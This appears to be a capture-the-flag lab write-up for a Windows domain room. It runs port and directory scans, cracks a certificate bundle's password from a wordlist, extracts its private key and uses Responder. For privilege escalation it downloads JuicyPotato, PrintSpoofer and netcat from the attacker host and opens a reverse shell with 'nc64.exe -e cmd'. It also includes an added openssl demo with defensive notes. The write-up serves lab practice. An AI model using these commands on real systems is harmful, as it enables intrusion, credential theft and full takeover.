This room covers DNS poisoning plus a SeImpersonatePrivilege privilege escalation.

nmap -v --min-rate 10000 10.10.113.180 -p-

nmap -T4 -n -sC -sV -Pn 10.10.113.180 -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,3389,5222,5223,5229,5262,5263,5269,5270,5275,5276,7070,7443,7777,9090,9091,9389,49667,49668,49669,49670,49671,49687,49699

Firefox threw an error, so next I scanned for directories 👇

./gobuster dir -k -u https://fire.windcorp.thm  -q -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

PFX file

Brute-force the password with a tool, then connect.

crackpkcs12 -d /usr/share/wordlists/rockyou.txt  /home/kali/Downloads/cert.pfx

ganteng

openssl pkcs12 -in cert.pfx -info -noout
openssl pkcs12 -in cert.pfx -info -nokeys

Brute-forced the certificate with the tool and obtained the private key 👆
Export the certificate as crt and key:
openssl pkcs12 -in cert.pfx -out selfservice.crt.pem -clcerts -nokeys

openssl pkcs12 -in cert.pfx -out selfservice.key.pem -nocerts -nodes
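The PFX handling above (inspect with `openssl pkcs12 -info`, then split the bundle into a certificate PEM and a key PEM), as an added example that is not part of the original writeup: it builds a throwaway self-signed PKCS#12 bundle with a constructed password, reads the certificate subject from it, and runs the same two export commands. The temp directory, the CN `selfservice.example.test` and the password `demo-password` are all constructed; the only assumption is that the `openssl` command-line tool is installed.

```shell
#!/bin/sh
# Added example, not from the original writeup. Builds a constructed PKCS#12 bundle
# and applies the same openssl steps the writeup runs against cert.pfx.
# Assumes only that the openssl command-line tool is on PATH.

WORK="${TMPDIR:-/tmp}/pfx-demo.$$"

make_demo_pfx() {
  # Constructed test data: a one-day self-signed cert and key packed into demo.pfx.
  # The password is known here; in the writeup it had to be recovered from a wordlist.
  mkdir -p "$WORK"
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -subj "/CN=selfservice.example.test" \
    -keyout "$WORK/demo.key" -out "$WORK/demo.crt" >/dev/null 2>&1
  openssl pkcs12 -export -in "$WORK/demo.crt" -inkey "$WORK/demo.key" \
    -out "$WORK/demo.pfx" -passout pass:demo-password
  echo "$WORK/demo.pfx"
}

pfx_subject_cn() {
  # Counterpart of `openssl pkcs12 -in cert.pfx -info -nokeys`: dump the certificate
  # bag and read its subject CN. Prints nothing if the password does not open the file.
  openssl pkcs12 -in "$1" -nokeys -passin "pass:$2" 2>/dev/null \
    | openssl x509 -noout -subject 2>/dev/null \
    | sed 's/.*CN *= *//'
}

split_pfx() {
  # The two export steps from the writeup: certificate-only PEM, then the private key
  # as an unencrypted PEM (-nodes). Prints the number of certificates written.
  openssl pkcs12 -in "$1" -out "$WORK/selfservice.crt.pem" -clcerts -nokeys \
    -passin "pass:$2" 2>/dev/null
  openssl pkcs12 -in "$1" -out "$WORK/selfservice.key.pem" -nocerts -nodes \
    -passin "pass:$2" 2>/dev/null
  grep -c 'BEGIN CERTIFICATE' "$WORK/selfservice.crt.pem"
}

key_is_unencrypted() {
  # After -nodes the key PEM has no encryption header: whoever holds the file holds the key.
  grep -q 'BEGIN PRIVATE KEY' "$WORK/selfservice.key.pem" \
    && ! grep -q 'ENCRYPTED' "$WORK/selfservice.key.pem"
}

cleanup_demo() { rm -rf "$WORK"; }

# Stand-alone run: build, inspect, split, report, clean up.
PFX=$(make_demo_pfx)
echo "subject CN: $(pfx_subject_cn "$PFX" demo-password)"
echo "certificates exported: $(split_pfx "$PFX" demo-password)"
key_is_unencrypted && echo "key PEM is unencrypted"
cleanup_demo
```

The defender's takeaway is in `pfx_subject_cn` and `key_is_unencrypted`: a wrong password yields nothing, so the only thing protecting a PFX left in a web-reachable directory is the strength of that password, and once it is opened the `-nodes` export produces a plaintext private key that is as good as the original for impersonating the service.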

Then edit Responder.conf
!Angelus25!

Privilege escalation

Method one

Upload the tools (downloaded onto the target from the attack host):
/home/kali/ppyy/tool/nc
JuicyPotato.exe nc64.exe PrintSpoofer64.exe
powershell -Command "Invoke-WebRequest -Uri 'http://10.11.132.105/JuicyPotato.exe' -OutFile 'C:\Users\edwardle.WINDCORP\Documents\JuicyPotato.exe'"

powershell -Command "Invoke-WebRequest -Uri 'http://10.11.132.105/PrintSpoofer64.exe' -OutFile 'C:\Users\edwardle.WINDCORP\Documents\PrintSpoofer64.exe'"

powershell -Command "Invoke-WebRequest -Uri 'http://10.11.132.105/nc64.exe' -OutFile 'C:\Users\edwardle.WINDCORP\Documents\nc64.exe'"

./PrintSpoofer64.exe -c "./nc64.exe 10.11.132.105 4444 -e cmd"

Method two

SweetPotato

It has to be compiled yourself; I didn't bother.

References